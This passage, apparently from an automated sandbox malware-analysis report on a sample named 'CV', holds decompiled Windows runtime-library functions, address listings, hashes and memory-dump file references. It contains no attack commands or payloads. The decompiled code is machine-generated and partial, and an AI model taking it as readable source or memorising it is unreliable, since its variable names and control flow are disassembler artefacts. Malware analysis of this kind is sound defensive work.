						if( *0x1338708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1337b00; // 0x0
							asm("ror esi, cl");
							 *0x133b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E012895D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01257F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x012703f1
0x012703f7
0x012703f9
0x012703fb
0x012703fd
0x01270400
0x0127040a
0x012b4c7a
0x01270537
0x01270547
0x01270410
0x01270410
0x01270414
0x01270417
0x0127041a
0x01270421
0x01270424
0x0127042b
0x0127043b
0x0127043e
0x0127043f
0x0127043f
0x01270446
0x01270449
0x0127044c
0x0127044f
0x01270459
0x012b4c8d
0x0127045f
0x0127045f
0x0127045f
0x01270467
0x012b4c97
0x012b4c9d
0x012b4ca4
0x012b4caa
0x012b4caf
0x012b4cb1
0x012b4cc3
0x012b4cb3
0x012b4cbc
0x012b4cbc
0x012b4cc8
0x012b4ccb
0x012b4cd7
0x012b4cda
0x012b4cdf
0x012b4cdf
0x012b4ccb
0x012b4ca4
0x0127046d
0x0127046f
0x0127046f
0x01270471
0x01270476
0x0127047a
0x0127047b
0x01270483
0x01270489
0x0127048d
0x00000000
0x00000000
0x012b4ce9
0x012b4cef
0x012b4d22
0x012b4d22
0x00000000
0x012b4d22
0x012b4cf1
0x012b4cf7
0x00000000
0x00000000
0x012b4cf9
0x012b4cff
0x00000000
0x00000000
0x012b4d05
0x012b4d07
0x00000000
0x00000000
0x012b4d0d
0x012b4d0f
0x012b4d14
0x012b4d16
0x00000000
0x00000000
0x012b4d1c
0x012b4d1c
0x01270499
0x01270535
0x01270535
0x00000000
0x01270535
0x012704a6
0x012b4d2c
0x012b4d37
0x012b4d39
0x012b4d3b
0x00000000
0x00000000
0x012b4d41
0x012b4d48
0x01270527
0x0127052b
0x0127052d
0x01270530
0x01270530
0x00000000
0x0127052b
0x012b4d4e
0x012704ac
0x012704ac
0x012704af
0x012704b2
0x012704b7
0x012704b9
0x012704bb
0x012704bd
0x012704bf
0x012704c5
0x012704c9
0x012b4d53
0x012b4d59
0x012b4db9
0x012b4dba
0x012b4dbf
0x012b4dc2
0x012b4dc4
0x012b4dc7
0x012b4dce
0x00000000
0x012b4dce
0x012b4d5b
0x012b4d61
0x00000000
0x00000000
0x012b4d63
0x012b4d69
0x00000000
0x00000000
0x012b4d6b
0x012b4d6e
0x012b4d74
0x012b4d76
0x012b4d7c
0x012b4d7e
0x012b4d84
0x012b4d89
0x012b4d8c
0x012b4d8d
0x012b4d92
0x012b4d95
0x012b4d96
0x012b4d98
0x012b4d9a
0x012b4d9f
0x012b4da4
0x012b4da6
0x012b4da8
0x012b4daf
0x012b4db1
0x012b4db1
0x012b4daf
0x012b4da6
0x012b4d84
0x012b4d7c
0x00000000
0x012b4d74
0x012704d6
0x012b4de1
0x012704dc
0x012704dc
0x012704dc
0x012704e4
0x012b4deb
0x012b4df1
0x012b4df8
0x012b4dfe
0x012b4e03
0x012b4e05
0x012b4e17
0x012b4e07
0x012b4e10
0x012b4e10
0x012b4e1c
0x012b4e1f
0x012b4e35
0x012b4e35
0x012b4e1f
0x012b4df8
0x012704f1
0x012704fa
0x012b4e3f
0x012b4e47
0x012b4e5b
0x012b4e61
0x012b4e67
0x012b4e69
0x012b4e71
0x012b4e73
0x01270500
0x01270500
0x01270500
0x012704fa
0x01270508
0x0127051d
0x0127051d
0x0127051f
0x01270524
0x00000000
0x01270524
0x01270515
0x01270517
0x012b4e7a
0x012b4e7c
0x00000000
0x00000000
0x012b4e85
0x00000000
0x012b4e85
0x00000000
0x01270517

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ca713dcd32c9eda48e7d5c1fdef0a17b382494ff2e7c4920d5d7ab07626fe8
Instruction ID: a73c4dea0caec96546fd3cfcc6843f7e1224fc770974fdeca773002a9cf2d9dd
Opcode Fuzzy Hash: 83ca713dcd32c9eda48e7d5c1fdef0a17b382494ff2e7c4920d5d7ab07626fe8
Instruction Fuzzy Hash: 0C915831E202569FEB31AB6CC884BFE7BA4EB02764F050265FB12A72D2D7749D44C785

Uniqueness

Uniqueness Score: -1.00%

Function 0124B171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E0124B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x131f7a8);
				E0129D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0129D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0128D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0128F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E0129DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0128B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0128B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0128E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0128A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0124b171
0x0124b171
0x0124b171
0x0124b171
0x0124b171
0x0124b176
0x0124b17b
0x0124b180
0x0124b186
0x0124b18f
0x0124b198
0x0124b1a4
0x0124b1aa
0x012a4802
0x012a4802
0x012a4805
0x012a480c
0x012a480e
0x0124b1d1
0x0124b1d3
0x0124b1de
0x0124b1de
0x012a4817
0x012a481e
0x012a4820
0x012a4822
0x012a4822
0x012a4824
0x012a4824
0x012a482a
0x00000000
0x00000000
0x012a4835
0x012a483a
0x012a483d
0x012a483f
0x012a4842
0x012a4842
0x012a4842
0x012a4846
0x012a484c
0x012a484e
0x012a4851
0x012a4851
0x012a4853
0x012a4854
0x012a4854
0x012a4858
0x012a485a
0x012a485a
0x012a485d
0x012a485f
0x012a4861
0x012a4861
0x012a4866
0x012a486b
0x012a486e
0x012a4871
0x012a4876
0x012a4876
0x012a4878
0x012a487b
0x012a4884
0x012a4884
0x00000000
0x012a487d
0x012a487d
0x012a4882
0x012a4889
0x012a4889
0x012a488f
0x012a4891
0x012a48e0
0x012a48e2
0x012a48e4
0x012a48e4
0x012a48e7
0x012a48e7
0x012a48ed
0x012a48f4
0x012a48f6
0x012a4951
0x012a4951
0x012a4953
0x012a4953
0x012a4956
0x012a4956
0x012a4958
0x012a4959
0x012a4959
0x012a495d
0x012a495d
0x012a495f
0x012a495f
0x012a4965
0x012a4969
0x012a49ba
0x012a49ba
0x012a49c1
0x012a49c5
0x012a49cc
0x012a49d4
0x012a49d7
0x012a49da
0x012a49e4
0x012a49e5
0x012a49f3
0x012a4a02
0x00000000
0x012a4a02
0x012a4972
0x012a4974
0x00000000
0x00000000
0x012a4976
0x012a4979
0x012a4982
0x012a4983
0x012a4984
0x012a498b
0x012a498d
0x012a4991
0x012a4993
0x012a4999
0x012a499d
0x012a49a2
0x012a49a2
0x012a49a2
0x012a4999
0x012a49ac
0x00000000
0x012a49b3
0x012a48f8
0x012a48fe
0x00000000
0x00000000
0x00000000
0x012a48fe
0x012a4895
0x012a489c
0x012a48ad
0x012a48b2
0x012a48b5
0x012a48b7
0x012a48ba
0x012a48bc
0x012a48c6
0x012a48c6
0x012a48cb
0x012a48d1
0x012a48d4
0x012a48d8
0x012a48d8
0x00000000
0x012a48d8
0x012a48be
0x012a48c0
0x00000000
0x00000000
0x012a48c2
0x00000000
0x00000000
0x00000000
0x012a48c4
0x00000000
0x012a4882
0x012a487b
0x012a4904
0x012a4906
0x00000000
0x00000000
0x012a4908
0x012a490e
0x00000000
0x00000000
0x012a4910
0x012a4917
0x012a4917
0x00000000
0x012a4917
0x0124b1ba
0x012a47f9
0x012a47fc
0x00000000
0x00000000
0x00000000
0x012a47fc
0x0124b1c0
0x0124b1c0
0x0124b1c3
0x0124b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 012A48AD

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: eb72e333eec8ef1e2db747b0f0069bdb5d1e9a25488435bb2ca5fdf3a440311f
Instruction ID: c9c5f5be8ae9b64fd9be817ec1e9dee06a8ebe36109f87a3f7e97e5f49c8456f
Opcode Fuzzy Hash: eb72e333eec8ef1e2db747b0f0069bdb5d1e9a25488435bb2ca5fdf3a440311f
Instruction Fuzzy Hash: 6451F471D2029A8FDF35EF68C845BBEBBB0BF00710F5841ADD9599B282D7B08945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0126B944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0126B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x133d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01267D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01318CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01289E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0128B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0128CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01267D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01318F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0128AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1338628; // 0x0
								_v68 = _t77;
								_t78 =  *0x133862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1338628; // 0x0
							_t116 =  *0x133862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0126b94c
0x0126b956
0x0126b95c
0x0126b95e
0x0126b964
0x0126b969
0x0126b96d
0x0126b96d
0x0126b970
0x0126b974
0x0126b97a
0x0126badf
0x0126badf
0x0126bae2
0x0126bae4
0x0126bae6
0x0126baf0
0x012b2cb8
0x0126baf6
0x0126baf6
0x0126baf6
0x0126bafd
0x0126bb1f
0x0126bb1f
0x0126baff
0x0126bb00
0x0126bb00
0x0126bb03
0x0126bb03
0x0126bacb
0x0126bacf
0x0126bad0
0x0126bad1
0x0126badc
0x0126badc
0x0126b980
0x0126b980
0x0126b988
0x0126b98b
0x0126b98d
0x0126b990
0x0126b993
0x0126b999
0x0126b99b
0x0126b9a1
0x0126b9a5
0x0126b9aa
0x0126b9b0
0x0126b9bb
0x0126b9c0
0x0126b9c3
0x0126b9ca
0x0126b9cc
0x0126b9cf
0x0126b9d3
0x0126b9d7
0x0126ba94
0x0126ba94
0x0126ba98
0x0126baa3
0x012b2ccb
0x0126baa9
0x0126baa9
0x0126baa9
0x0126bab1
0x012b2cd5
0x012b2cdd
0x012b2cdd
0x0126babb
0x0126babc
0x0126bac2
0x0126bac3
0x0126bac3
0x0126bac6
0x00000000
0x0126b9dd
0x0126b9dd
0x0126b9e7
0x0126b9e7
0x0126b9ec
0x0126b9ec
0x0126b9f1
0x0126b9f5
0x0126b9fa
0x0126ba00
0x0126ba0c
0x0126ba10
0x0126ba10
0x0126ba12
0x0126ba18
0x00000000
0x00000000
0x0126bb26
0x0126bb26
0x0126ba1e
0x0126ba1e
0x0126ba23
0x0126ba25
0x0126ba2c
0x0126ba30
0x0126ba35
0x0126ba35
0x0126ba41
0x0126ba46
0x0126ba4c
0x0126ba50
0x0126ba54
0x0126ba6a
0x0126ba6e
0x0126ba70
0x0126ba74
0x0126ba78
0x0126ba7a
0x0126ba7c
0x0126ba8e
0x0126ba90
0x0126ba92
0x0126bb14
0x0126bb14
0x0126bb16
0x0126bb16
0x00000000
0x0126ba7c
0x0126bb0a
0x0126bb0d
0x00000000
0x00000000
0x00000000
0x0126bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0126B9A5

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 09d25ce13c4311cc65de9500f74cdf7aa9a482247dc26d19d512784fe7ef42d8
Instruction ID: 61e54bf8afac89f4e2559bb7909fcee3cd944b5d7c79ab8ef2c6fe742d633671
Opcode Fuzzy Hash: 09d25ce13c4311cc65de9500f74cdf7aa9a482247dc26d19d512784fe7ef42d8
Instruction Fuzzy Hash: B1514A71629342CFC720DF29C08092ABBE9FB88654F14496EFA95C7395D771EC84CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01284A2C Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01284A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x133d360 ^ _t62;
				_v8 =  *0x133d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01262280(_t26, 0x1338608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0125FFB0(_t41, _t51, 0x1338608);
						L2:
						 *0x133b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0128B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01262280(_t28, 0x1338608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0125FFB0(_t42, _t53, 0x1338608);
							if(_t53 != 0) {
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0125FFB0(_t41, _t51, 0x1338608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01284a2c
0x01284a34
0x01284a3c
0x01284a3e
0x01284a48
0x01284a4b
0x01284a4d
0x01284a51
0x01284a9c
0x00000000
0x00000000
0x01284aa3
0x01284aa8
0x01284aad
0x01284ab1
0x01284ade
0x01284ae3
0x01284a5a
0x01284a62
0x01284a6a
0x01284a6e
0x012bf203
0x01284a84
0x01284a88
0x01284a89
0x01284a8a
0x01284a95
0x01284a95
0x01284a79
0x01284a80
0x01284af2
0x01284af4
0x01284af9
0x01284aff
0x01284b01
0x01284b03
0x01284b08
0x012bf20a
0x012bf212
0x012bf216
0x012bf216
0x01284b08
0x01284b13
0x01284b1a
0x012bf229
0x012bf229
0x01284b1a
0x01284a82
0x00000000
0x01284a82
0x01284ab7
0x01284acd
0x01284acd
0x01284ad5
0x01284ada
0x00000000
0x01284ada
0x01284ac2
0x01284acb
0x00000000
0x00000000
0x00000000
0x01284acb
0x01284a53
0x01284a53
0x01284a58
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01284A62

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 549052cb6284210835c5cd7b19f5cf6057f766d09522b269bf81274db993c966
Instruction ID: eef64499651cbc85cda28490126dd70fbf38952ff6b9dddf369780e27ba7d258
Opcode Fuzzy Hash: 549052cb6284210835c5cd7b19f5cf6057f766d09522b269bf81274db993c966
Instruction Fuzzy Hash: 1C31E4322263939BD721BF58C985B2AFBA4FFC0B14F014559EA564B681C7B4E844CB89

Uniqueness

Uniqueness Score: -1.00%

Function 01260050 Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E01260050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x133d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01279ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0128B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
